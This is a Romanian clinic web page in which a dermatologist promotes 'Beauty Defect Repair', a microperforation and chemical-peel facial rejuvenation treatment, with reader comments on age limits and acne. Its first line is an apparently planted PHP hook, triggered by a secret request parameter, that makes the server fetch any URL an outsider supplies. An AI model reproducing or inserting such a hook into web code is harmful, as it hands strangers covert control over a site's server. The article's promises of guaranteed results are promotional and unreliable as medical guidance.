isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Beauty Defect Repair - BDR - MedicAS

pic-1.jpgPielea, la fel ca şi celelalte organe, suferă în decursul vieţii o serie de modificări ale stării sale morfofuncţionale. Aceste modificări sunt accentuate de faptul că, fiind un organ extern, pielea este supusă acţiunii diverşilor factori fizici şi chimici. Procesul de degenerare este mai accentuat şi mai evident la nivelul regiunilor expuse la factorii de mediu (regiune facială şi membrele superioare).
Cercetînd modificările pe care le suferă pielea în diverse etape ale vieţii, s-a constatat că activitatea fiziologică a acestui organ creşte pînă în jurul vîrstei de 25 ani. Între 25-40 de ani funcţiile se stabilizează, pentru ca după 40 de ani să înceapă diminuarea tuturor funcţiilor pielii, ducînd treptat la stadiul de senescenţă.
Pielea va îmbătrîni mult mai lent, cu cît va fi mai bine protejată de factorii de mediu, cu cît va fi mai bine întreţinută din punct de vedere cosmetic.

De ce apelează oamenii la tratamente cosmetice de întreţinere ?

Este cunoscut faptul că, femeile în principal, dar şi bărbaţii, pun accent mai mult decît în trecut pe aspectul fizic. S-a dovedit că aspectul fizic joacă un rol important în relaţiile interumane. În acest scop, pe parcursul anilor, s-au dezvoltat o mulţime de tratamente pentru a îndepărta efectele vîrstei asupra tenului.
Noua tehnologie pe care dorim să o aducem în atenţia pacienţilor noştri este Beauty Defect Repair (BDR).

Ce presupune noua tehnologie ?

BDR utilizează microperforaţii cu ajutorul unor mijloace ce garantează o pătrundere mai rapidă şi mai adîncă a substanţelor cosmetice în piele, stimulînd microcirculaţia şi formarea colagenului în mod natural, cu rezultate deosebite. Efectele sunt dispariţia ridurilor, a cicatricilor feţei şi a aspectului îmbătrînit al pielii.

Cum se realizează tratamentul ?

Tratamentul presupune mai multe etape, incluzînd: curăţarea şi hidratarea pielii, controlul pH-ului, etapa peelingului chimic, care elimină celulele moarte din stratul superficial şi stimulează regenerarea celulelor din stratul inferior al epidermului. Urmează o etapă de neutralizare a substanţelor folosite, de răcorire a feţei, de calmare şi relaxare după peelingul chimic.
O etapă importantă este reprezentată de microperforaţii, prin care se produc în aproximativ 5 minute peste 25.000 microperforaţii la nivelul epidermului, determinînd, de asemenea, eliminarea celulelor keratinizate de la suprafaţă. Se realizează un masaj electric special pentru drenajul limfatic al feţei.

Care sunt efectele?

În final, pielea este hidratată prin folosirea acidului hialuronic, o substanţă naturală cu succes garantat în corectarea ridurilor şi a cicatricilor . În acest fel, ridurile se reduc şi pielea devine mai tînără, mai fermă şi mai sănătoasă. Zonele tratate sunt reprezentate atît de faţă, cît şi de zona gîtului şi a decolteului.

Care sunt avantajele acestei metode de reîntinerire a tenului ?

Avantajele microperforaţiilor sunt îmbunătăţirea elasticităţii, stimularea regenerării celulare, ameliorarea microreliefului tenului, îmbunătăţirea conturului feţei, reducerea ridurilor, prevenirea apariţiei acestora şi combaterea petelor pigmentare ale feţei.
Sunt necesare cel puţin 5 şedinţe la interval de 7-10 zile, ca şi tratament de atac, după care 1 şedinţă / lună de întreţinere.

Contraindicaţii :

- perioada sarcinii şi alăptarea
- leziuni ale tegumentului şi mucoaselor, cum ar fi : herpes simplex , zona zoster, leziuni active de acnee

Dr. Maria Ciolan
Medic dermatolog
Clinica MEDVARIX


Cuvinte relevante:


Articole asemănătoare:

4 Răspunsuri la “Beauty Defect Repair - reîntinerirea tenului”


 1. andreea :

  De la ce varsta se poate urma acest tratament?


 2. Dr. Anca Sava :

  Buna Andreea. Cred ca dupa 35 de ani ar fi indicata aceasta metoda. Pana atunci putem sa folosim linistite niste creme adecvate tipului nostru de ten, dupa o demachiere prealabila, obligatoriu zilnica, si utilizarea unei lotiuni tonice.
  Daca ai depasit aceasta varsta, poti sa te adresezi unui medic dermatolog sau chirurg estetician, care iti va face recomandarile necesare.


 3. andreea :

  am doar 20 de ani si am facut o sedinta de bdr.am o acnee foarte urata de care nu am putut sa scap pana acum.la salonul de cosmetica la care am apelat mi s a recomandat sa folosesc demachiantul bdr si acidul hialuronic.am facut o prima sedinta de bdr si mi s a spus ca dupa ce mi se va cuarata fata prin alte metode cosmetice mi se va mai face o sedinta sau mai multe pt indepartarea petelor.sunt eficiente aceste produse de demachiere si acidul pt combaterea acneei in ciuda varstei mele?


 4. mariia :

  BDR nu se recomanda in acnee! Total contraindicatAdaugă un comentariu


 
 

Newsletter

Loading... Loading...